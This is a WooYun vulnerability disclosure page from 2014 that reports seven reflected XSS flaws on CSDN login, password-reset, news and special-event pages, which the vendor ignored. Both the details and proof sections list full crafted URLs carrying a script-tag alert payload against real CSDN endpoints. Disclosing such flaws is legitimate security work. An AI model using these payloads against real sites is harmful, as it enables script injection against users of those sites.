当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2014-074360
漏洞标题:
CSDN 多处存在反射型xss
相关厂商:
CSDN开发者社区
漏洞作者:
路人甲
提交时间:
2014-08-29 17:31
修复时间:
2014-09-03 17:32
公开时间:
2014-09-03 17:32
漏洞类型:
xss跨站脚本攻击
危害等级:
自评Rank:
1
漏洞状态:
漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2014-08-29: 细节已通知厂商并且等待厂商处理中
2014-09-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

CSDN 多处存在反射型xss

详细说明:

第一处:http://passport.csdn.net/account/login?from=http%3a%2f%2fhero.csdn.net%2fOnlineCompiler%2fIndex%3fID%3d633%26ExamID%3d628%26from%3d4%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
第二处:http://news.csdn.net/article_preview.html?preview=1&reload=1&arcid=2821118%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
第三处:http://passport.csdn.net/account/login?from=http%3A%2F%2Fdownload.csdn.net%2Fmy%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
第四处:https://passport.csdn.net/account/fpwd?action=forgotpassword&service=http://www.csdn.net/%20service=http://www.csdn.net/%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
第五处:http://special.csdn.net/bdclive/index.html/2?regionid=1455%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
第六处:http://passport.csdn.net/account/fpwd?action=forgotpassword&from=http%3A%2F%2Fjob.csdn.net%2Fcsdn%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
第七处:http://passport.csdn.net/account/login?from=http%3A%2F%2Fnews.csdn.net%2Farticle%2F2014-08-27%2F2821403-the-top-9-of-ali-bigdata-competition%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E

漏洞证明:

第一处:http://passport.csdn.net/account/login?from=http%3a%2f%2fhero.csdn.net%2fOnlineCompiler%2fIndex%3fID%3d633%26ExamID%3d628%26from%3d4%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
第二处:http://news.csdn.net/article_preview.html?preview=1&reload=1&arcid=2821118%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
第三处:http://passport.csdn.net/account/login?from=http%3A%2F%2Fdownload.csdn.net%2Fmy%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
第四处:https://passport.csdn.net/account/fpwd?action=forgotpassword&service=http://www.csdn.net/%20service=http://www.csdn.net/%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
第五处:http://special.csdn.net/bdclive/index.html/2?regionid=1455%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
第六处:http://passport.csdn.net/account/fpwd?action=forgotpassword&from=http%3A%2F%2Fjob.csdn.net%2Fcsdn%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
第七处:http://passport.csdn.net/account/login?from=http%3A%2F%2Fnews.csdn.net%2Farticle%2F2014-08-27%2F2821403-the-top-9-of-ali-bigdata-competition%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E

修复方案:

慢慢过滤(*^__^*)

版权声明:转载请注明来源 路人甲@乌云

>

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-09-03 17:32

厂商回复:

最新状态:

暂无